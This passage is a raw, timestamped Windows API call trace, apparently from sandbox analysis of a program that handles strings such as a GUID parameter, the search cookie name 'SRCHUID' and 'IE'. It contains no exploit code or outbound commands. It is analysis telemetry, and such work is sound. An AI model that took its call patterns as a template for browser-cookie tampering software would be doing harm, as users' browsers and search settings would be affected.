RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f4a0 [0181.415] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f4a0 | out: hHeap=0x5f0000) returned 1 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f510 [0181.415] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.415] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f520, Size=0x9) returned 0x61f640 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f510 [0181.415] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f660 [0181.415] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.415] GetProcessHeap () returned 0x5f0000 [0181.415] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.416] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f640, Size=0x11) returned 0x636320 [0181.416] GetProcessHeap () returned 0x5f0000 [0181.416] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f600 [0181.416] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.416] GetProcessHeap () returned 0x5f0000 [0181.417] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.417] GetProcessHeap () returned 0x5f0000 [0181.417] GetProcessHeap () returned 0x5f0000 [0181.417] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f590 [0181.417] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.417] GetProcessHeap () returned 0x5f0000 [0181.417] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f590 | out: hHeap=0x5f0000) returned 1 [0181.417] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636320, Size=0x21) returned 0x613650 [0181.417] GetProcessHeap () returned 0x5f0000 [0181.417] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f580 [0181.417] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.417] GetProcessHeap () returned 0x5f0000 [0181.417] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f580 | out: hHeap=0x5f0000) returned 1 [0181.417] GetProcessHeap () returned 0x5f0000 [0181.417] GetProcessHeap () returned 0x5f0000 [0181.417] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f600 [0181.417] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.417] GetProcessHeap () returned 0x5f0000 [0181.417] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.417] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x613650, Size=0x41) returned 0x620640 [0181.417] GetProcessHeap () returned 0x5f0000 [0181.417] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f540 [0181.417] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f540 | out: hHeap=0x5f0000) returned 1 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5c0 [0181.418] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5c0 | out: hHeap=0x5f0000) returned 1 [0181.418] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620640, Size=0x29) returned 0x613800 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f620 | out: hHeap=0x5f0000) returned 1 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625040 | out: hHeap=0x5f0000) returned 1 [0181.418] lstrlenA (lpString="/") returned 1 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f510 [0181.418] lstrcpyA (in: lpString1=0x61f510, lpString2="/" | out: lpString1="/") returned="/" [0181.418] lstrlenA (lpString="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1") returned 50 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x33) returned 0x635250 [0181.418] lstrcpyA (in: lpString1=0x635250, lpString2="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1" | out: lpString1="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1") returned="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1" [0181.418] lstrlenA (lpString="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1") returned 50 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x33) returned 0x635210 [0181.418] lstrcpyA (in: lpString1=0x635210, lpString2="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1" | out: lpString1="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1") returned="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1" [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x33) returned 0x635550 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x33) returned 0x635590 [0181.418] GetProcessHeap () returned 0x5f0000 [0181.418] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635550 | out: hHeap=0x5f0000) returned 1 [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635210 | out: hHeap=0x5f0000) returned 1 [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635250 | out: hHeap=0x5f0000) returned 1 [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f510 | out: hHeap=0x5f0000) returned 1 [0181.419] lstrlenA (lpString="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1") returned 50 [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x33) returned 0x635390 [0181.419] lstrcpyA (in: lpString1=0x635390, lpString2="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1" | out: lpString1="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1") returned="V=2&GUID=A7B0A6E921DC4F0DAD29F370AA40DDBB&dmnchg=1" [0181.419] lstrlenA (lpString="") returned 0 [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f590 [0181.419] lstrcpyA (in: lpString1=0x61f590, lpString2="" | out: lpString1="") returned="" [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x635390 | out: hHeap=0x5f0000) returned 1 [0181.419] lstrlenA (lpString="\r\n") returned 2 [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f600 [0181.419] lstrcpyA (in: lpString1=0x61f600, lpString2="\r\n" | out: lpString1="\r\n") returned="\r\n" [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.419] lstrlenA (lpString="||") returned 2 [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f530 [0181.419] lstrcpyA (in: lpString1=0x61f530, lpString2="||" | out: lpString1="||") returned="||" [0181.419] lstrlenA (lpString="|") returned 1 [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f5b0 [0181.419] lstrcpyA (in: lpString1=0x61f5b0, lpString2="|" | out: lpString1="|") returned="|" [0181.419] lstrlenA (lpString="1024") returned 4 [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f540 [0181.419] lstrcpyA (in: lpString1=0x61f540, lpString2="1024" | out: lpString1="1024") returned="1024" [0181.419] GetProcessHeap () returned 0x5f0000 [0181.419] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f600 [0181.420] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.420] GetProcessHeap () returned 0x5f0000 [0181.420] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f600 | out: hHeap=0x5f0000) returned 1 [0181.420] StrToInt64ExA (in: pszString="1024", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.420] lstrlenA (lpString="1820274944") returned 10 [0181.420] GetProcessHeap () returned 0x5f0000 [0181.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f620 [0181.420] lstrcpyA (in: lpString1=0x61f620, lpString2="1820274944" | out: lpString1="1820274944") returned="1820274944" [0181.420] GetProcessHeap () returned 0x5f0000 [0181.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f480 [0181.420] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.420] GetProcessHeap () returned 0x5f0000 [0181.420] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f480 | out: hHeap=0x5f0000) returned 1 [0181.420] StrToInt64ExA (in: pszString="1820274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.420] lstrlenA (lpString="|") returned 1 [0181.420] GetProcessHeap () returned 0x5f0000 [0181.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f560 [0181.420] lstrcpyA (in: lpString1=0x61f560, lpString2="|" | out: lpString1="|") returned="|" [0181.420] lstrlenA (lpString="1024") returned 4 [0181.420] GetProcessHeap () returned 0x5f0000 [0181.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5) returned 0x61f670 [0181.420] lstrcpyA (in: lpString1=0x61f670, lpString2="1024" | out: lpString1="1024") returned="1024" [0181.420] GetProcessHeap () returned 0x5f0000 [0181.420] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f630 [0181.420] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.420] GetProcessHeap () returned 0x5f0000 [0181.420] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f630 | out: hHeap=0x5f0000) returned 1 [0181.420] StrToInt64ExA (in: pszString="1024", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.421] lstrlenA (lpString="1820274944") returned 10 [0181.421] GetProcessHeap () returned 0x5f0000 [0181.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5d0 [0181.421] lstrcpyA (in: lpString1=0x61f5d0, lpString2="1820274944" | out: lpString1="1820274944") returned="1820274944" [0181.421] GetProcessHeap () returned 0x5f0000 [0181.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f5a0 [0181.421] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrToInt64ExA") returned 0x7ffb262f5ce0 [0181.421] GetProcessHeap () returned 0x5f0000 [0181.421] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.421] StrToInt64ExA (in: pszString="1820274944", dwFlags=0x0, pllRet=0x5cf680 | out: pllRet=0x5cf680) returned 1 [0181.421] lstrlenA (lpString="|") returned 1 [0181.421] GetProcessHeap () returned 0x5f0000 [0181.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f600 [0181.421] lstrcpyA (in: lpString1=0x61f600, lpString2="|" | out: lpString1="|") returned="|" [0181.421] lstrlenA (lpString="|") returned 1 [0181.421] GetProcessHeap () returned 0x5f0000 [0181.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f4a0 [0181.421] lstrcpyA (in: lpString1=0x61f4a0, lpString2="|" | out: lpString1="|") returned="|" [0181.421] lstrlenA (lpString="|") returned 1 [0181.421] GetProcessHeap () returned 0x5f0000 [0181.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f510 [0181.421] lstrcpyA (in: lpString1=0x61f510, lpString2="|" | out: lpString1="|") returned="|" [0181.421] lstrlenA (lpString="|") returned 1 [0181.421] GetProcessHeap () returned 0x5f0000 [0181.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f580 [0181.421] lstrcpyA (in: lpString1=0x61f580, lpString2="|" | out: lpString1="|") returned="|" [0181.421] lstrlenA (lpString="|") returned 1 [0181.421] GetProcessHeap () returned 0x5f0000 [0181.421] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f550 [0181.421] lstrcpyA (in: lpString1=0x61f550, lpString2="|" | out: lpString1="|") returned="|" [0181.421] GetProcessHeap () returned 0x5f0000 [0181.422] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f480 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f520 [0181.422] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f490 [0181.422] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.422] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f480, Size=0x1) returned 0x61f630 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f520 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f660 [0181.422] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f640 [0181.422] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.422] GetProcessHeap () returned 0x5f0000 [0181.422] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f640 | out: hHeap=0x5f0000) returned 1 [0181.423] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f520, Size=0xb) returned 0x61f5a0 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f640 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f490 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f520 [0181.423] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f660 [0181.423] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.423] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f490, Size=0xb) returned 0x61f660 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xb) returned 0x61f5c0 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f660 | out: hHeap=0x5f0000) returned 1 [0181.423] lstrlenA (lpString="SRCHUID") returned 7 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x61f660 [0181.423] lstrcpyA (in: lpString1=0x61f660, lpString2="SRCHUID" | out: lpString1="SRCHUID") returned="SRCHUID" [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x61f480 [0181.423] GetProcessHeap () returned 0x5f0000 [0181.423] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5a0 [0181.424] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f490 [0181.424] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f490 | out: hHeap=0x5f0000) returned 1 [0181.424] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f480, Size=0xd) returned 0x61f490 [0181.424] lstrlenA (lpString="") returned 0 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1) returned 0x61f480 [0181.424] lstrcpyA (in: lpString1=0x61f480, lpString2="" | out: lpString1="") returned="" [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x2) returned 0x61f520 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f5a0 [0181.424] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.424] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f5a0 [0181.424] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.424] GetProcessHeap () returned 0x5f0000 [0181.425] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f5a0 | out: hHeap=0x5f0000) returned 1 [0181.425] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x61f520, Size=0x1) returned 0x61f5a0 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x46) returned 0x620820 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f520 [0181.425] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f520 [0181.425] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f520 | out: hHeap=0x5f0000) returned 1 [0181.425] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x620820, Size=0x45) returned 0x620550 [0181.425] lstrlenA (lpString="IE") returned 2 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x3) returned 0x61f520 [0181.425] lstrcpyA (in: lpString1=0x61f520, lpString2="IE" | out: lpString1="IE") returned="IE" [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x6360a0 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xf) returned 0x61f780 [0181.425] GetProcAddress (hModule=0x7ffb26230000, lpProcName="GetProcessHeap") returned 0x7ffb2624d4f0 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.425] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f780 | out: hHeap=0x5f0000) returned 1 [0181.425] GetProcessHeap () returned 0x5f0000 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x61f700 [0181.426] GetProcAddress (hModule=0x7ffb26230000, lpProcName="HeapReAlloc") returned 0x7ffb28b239f0 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x61f700 | out: hHeap=0x5f0000) returned 1 [0181.426] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6360a0, Size=0x11) returned 0x636200 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x11) returned 0x636420 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636420, Size=0x23) returned 0x613650 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12) returned 0x6360c0 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6360c0, Size=0x27) returned 0x613b90 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x14) returned 0x636320 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636320, Size=0x29) returned 0x6138f0 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x15) returned 0x636260 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x636260, Size=0xb1) returned 0x6217c0 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x59) returned 0x6188f0 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6188f0, Size=0xb3) returned 0x621280 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5a) returned 0x618290 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5a) returned 0x6188f0 [0181.426] GetProcessHeap () returned 0x5f0000 [0181.426] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6188f0, Size=0xb5) returned 0x621340 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x5b) returned 0x618b90 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x618b90, Size=0xcd) returned 0x625ca0 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x67) returned 0x625040 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625040, Size=0xcf) returned 0x625d80 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x68) returned 0x625040 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x625040, Size=0xe3) returned 0x627350 [0181.427] GetProcessHeap () returned 0x5f0000 [0181.427] 